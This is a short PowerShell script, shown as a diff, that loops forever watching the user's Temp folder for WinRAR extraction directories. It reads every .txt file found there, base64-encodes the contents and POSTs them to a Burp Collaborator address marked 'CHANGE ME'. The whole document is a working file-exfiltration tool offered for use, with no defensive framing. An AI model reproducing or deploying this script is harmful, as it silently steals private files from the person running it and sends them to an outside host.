| 1 | + | # Author: Abdullah Alqeisi |
| 2 | + | |
| 3 | + | $temp = $env:Username |
| 4 | + | $temp = $temp.toCharArray() |
| 5 | + | $username = "" |
| 6 | + | |
| 7 | + | foreach ($letter in $temp) { |
| 8 | + | if($letter -ne ' '){$username += $letter} |
| 9 | + | if($letter -eq ' '){break} |
| 10 | + | } |
| 11 | + | |
| 12 | + | while(1) { |
| 13 | + | |
| 14 | + | if(Get-ChildItem -Path C:\Users\$username\AppData\Local\Temp | Where-Object { $_.Name -match 'Rar.........\..' }){ |
| 15 | + | |
| 16 | + | foreach ($directory in (Get-ChildItem -Path C:\Users\$username\AppData\Local\Temp | Where-Object { $_.Name -match 'Rar.........\..' })){ |
| 17 | + | |
| 18 | + | foreach ($filename in Get-ChildItem -Path C:\Users\$username\AppData\Local\Temp\$directory\*.txt){ |
| 19 | + | |
| 20 | + | $filecontent= Get-Content $filename |
| 21 | + | $filecontentbytes = [System.Text.Encoding]::UTF8.GetBytes($filecontent) |
| 22 | + | $B64EncodedContent = [System.Convert]::ToBase64String($filecontentbytes) |
| 23 | + | |
| 24 | + | $target = "https://fo70z55wxi56zxob33p9oiq8hznpbe.burpcollaborator.net" #CHANGE ME |
| 25 | + | $postParams = @{payload=$B64EncodedContent} |
| 26 | + | Invoke-WebRequest -Uri $target -Method POST -Body $postParams |
| 27 | + | |
| 28 | + | } |
| 29 | + | |
| 30 | + | } |
| 31 | + | |
| 32 | + | } |
| 33 | + | |
| 34 | + | } |
| 35 | + | |
| 36 | + | |
| 37 | + | |